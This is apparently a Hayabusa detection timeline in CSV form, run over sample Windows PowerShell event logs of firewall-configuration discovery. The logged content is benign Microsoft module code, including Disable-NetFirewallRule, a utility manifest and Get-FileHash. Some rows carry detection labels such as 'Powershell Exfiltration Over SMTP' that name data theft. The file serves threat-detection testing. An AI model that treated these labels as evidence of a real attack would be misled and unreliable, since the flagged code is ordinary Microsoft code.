[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssocia",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) 
$__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and 
(@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] 
switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated 
(PowerShell).evtx 2021-10-25 16:23:05.598 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.598 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exfil,Powershell Exfiltration Over SMTP,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_send_mailmessage.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""1DA87E53-152B-403E-98DC-74D7B4D63D59"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. 
All rights reserved."" ModuleVersion=""3.1.0.0"" PowerShellVersion=""3.0"" CLRVersion=""4.0"" CmdletsToExport= ""Format-List"", ""Format-Custom"", ""Format-Table"", ""Format-Wide"", ""Out-File"", ""Out-Printer"", ""Out-String"", ""Out-GridView"", ""Get-FormatData"", ""Export-FormatData"", ""ConvertFrom-Json"", ""ConvertTo-Json"", ""Invoke-RestMethod"", ""Invoke-WebRequest"", ""Register-ObjectEvent"", ""Register-EngineEvent"", ""Wait-Event"", ""Get-Event"", ""Remove-Event"", ""Get-EventSubscriber"", ""Unregister-Event"", ""New-Event"", ""Add-Member"", ""Add-Type"", ""Compare-Object"", ""ConvertTo-Html"", ""ConvertFrom-StringData"", ""Export-Csv"", ""Import-Csv"", ""ConvertTo-Csv"", ""ConvertFrom-Csv"", ""Export-Alias"", ""Invoke-Expression"", ""Get-Alias"", ""Get-Culture"", ""Get-Date"", ""Get-Host"", ""Get-Member"", ""Get-Random"", ""Get-UICulture"", ""Get-FileHash"", ""Get-Unique"", ""Export-PSSession"", ""Import-PSSession"", ""Import-Alias"", ""Import-LocalizedData"", ""Select-String"", ""Measure-Object"", ""New-Alias"", ""New-TimeSpan"", ""Read-Host"", ""Set-Alias"", ""Set-Date"", ""Start-Sleep"", ""Tee-Object"", ""Measure-Command"", ""Update-List"", ""Update-TypeData"", ""Update-FormatData"", ""Remove-TypeData"", ""Get-TypeData"", ""Write-Host"", ""Write-Progress"", ""New-Object"", ""Select-Object"", ""Group-Object"", ""Sort-Object"", ""Get-Variable"", ""New-Variable"", ""Set-Variable"", ""Remove-Variable"", ""Clear-Variable"", ""Export-Clixml"", ""Import-Clixml"", ""ConvertTo-Xml"", ""Select-Xml"", ""Write-Debug"", ""Write-Verbose"", ""Write-Warning"", ""Write-Error"", ""Write-Output"", ""Set-PSBreakpoint"", ""Get-PSBreakpoint"", ""Remove-PSBreakpoint"", ""Enable-PSBreakpoint"", ""Disable-PSBreakpoint"", ""Get-PSCallStack"", ""Send-MailMessage"", ""Get-TraceSource"", ""Set-TraceSource"", ""Trace-Command"", ""Show-Command"", ""Unblock-File"" NestedModules=""Microsoft.PowerShell.Commands.Utility.dll"",""Microsoft.PowerShell.Utility.psm1"" HelpInfoURI = 
'http://go.microsoft.com/fwlink/?linkid=285758' }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-FileHash { [CmdletBinding(DefaultParameterSetName = ""Path"")] param( [Parameter(Mandatory, ParameterSetName=""Path"", Position = 0)] [System.String[]] $Path, [Parameter(Mandatory, 
ParameterSetName=""LiteralPath"", ValueFromPipelineByPropertyName = $true)] [Alias(""PSPath"")] [System.String[]] $LiteralPath, [Parameter(Mandatory, ParameterSetName=""Stream"")] [System.IO.Stream] $InputStream, [ValidateSet(""SHA1"", ""SHA256"", ""SHA384"", ""SHA512"", ""MACTripleDES"", ""MD5"", ""RIPEMD160"")] [System.String] $Algorithm=""SHA256"" ) begin { # Construct the strongly-typed crypto object $hasher = [System.Security.Cryptography.HashAlgorithm]::Create($Algorithm) } process { if($PSCmdlet.ParameterSetName -eq ""Stream"") { GetStreamHash -InputStream $InputStream -RelatedPath $null -Hasher $hasher } else { $pathsToProcess = @() if($PSCmdlet.ParameterSetName -eq ""LiteralPath"") { $pathsToProcess += Resolve-Path -LiteralPath $LiteralPath | Foreach-Object ProviderPath } if($PSCmdlet.ParameterSetName -eq ""Path"") { $pathsToProcess += Resolve-Path $Path | Foreach-Object ProviderPath } foreach($filePath in $pathsToProcess) { if(Test-Path -LiteralPath $filePath -PathType Container) { continue } try { # Read the file specified in $FilePath as a Byte array [system.io.stream]$stream = [system.io.file]::OpenRead($filePath) GetStreamHash -InputStream $stream -RelatedPath $filePath -Hasher $hasher } catch [Exception] { $errorMessage = [Microsoft.PowerShell.Commands.UtilityResources]::FileReadError -f $FilePath, $_ Write-Error -Message $errorMessage -Category ReadError -ErrorId ""FileReadError"" -TargetObject $FilePath return } finally { if($stream) { $stream.Close() } } } } } } function GetStreamHash { param( [System.IO.Stream] $InputStream, [System.String] $RelatedPath, [System.Security.Cryptography.HashAlgorithm] $Hasher) # Compute file-hash using the crypto object [Byte[]] $computedHash = $Hasher.ComputeHash($InputStream) [string] $hash = [BitConverter]::ToString($computedHash) -replace '-','' if ($RelatedPath -eq $null) { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash } $retVal.psobject.TypeNames.Insert(0, 
""Microsoft.Powershell.Utility.FileHash"") $retVal } else { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash Path = $RelatedPath } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } } # SIG # Begin signature block # MIIavwYJKoZIhvcNAQcCoIIasDCCGqwCAQExCzAJBgUrDgMCGgUAMGkGCisGAQQB # gjcCAQSgWzBZMDQGCisGAQQBgjcCAR4wJgIDAQAABBAfzDtgWUsITrck0sYpfvNR # AgEAAgEAAgEAAgEAAgEAMCEwCQYFKw4DAhoFAAQU4uPI6oMmN45jE4gtibs9Byjz # 1dCgghWCMIIEwzCCA6ugAwIBAgITMwAAADUo7mFTkiJhkQAAAAAANTANBgkqhkiG # 9w0BAQUFADB3MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4G # A1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSEw # HwYDVQQDExhNaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EwHhcNMTMwMzI3MjAwODI2 # WhcNMTQwNjI3MjAwODI2WjCBszELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjENMAsGA1UECxMETU9QUjEnMCUGA1UECxMebkNpcGhlciBEU0UgRVNO # OjMxQzUtMzBCQS03QzkxMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAm9vWEfGEH1m0 # kUedzTgvsolxQaJbPc6WtX2a9wqAK0ICg8R8//f26pcftWw4XkuVVOjsk9K5TeT3 # KyaHr7vrG+hNHCFDF/igM5qRsYFNOIEkUwKxdnlaLqz7y4xcXTubXKU7NoBsI3S2 # xnffQyfNOpmouBP65aqjt8VzhFbsjsFIMwGJMa8nNq07LQDicQQxvva3dLFnP1rl # hLUBJpB4iYAlPj5CHFJKZCcCaM6iBr7QtT5EF4CZiImcwLkP1fI5lcM1FLsJEEW5 # 6m5frIDLh3xFZAImCU+adqVmvhBJKKO57P+y+mFb+WPqknL1SurKOz0TkYw7/TnW # STwC7nod4QIDAQABo4IBCTCCAQUwHQYDVR0OBBYEFLkUVdsQ7WBr1Q2DdA3Oc3OV # ImUcMB8GA1UdIwQYMBaAFCM0+NlSRnAK7UD7dvuzK7DDNbMPMFQGA1UdHwRNMEsw # SaBHoEWGQ2h0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3Rz # L01pY3Jvc29mdFRpbWVTdGFtcFBDQS5jcmwwWAYIKwYBBQUHAQEETDBKMEgGCCsG # 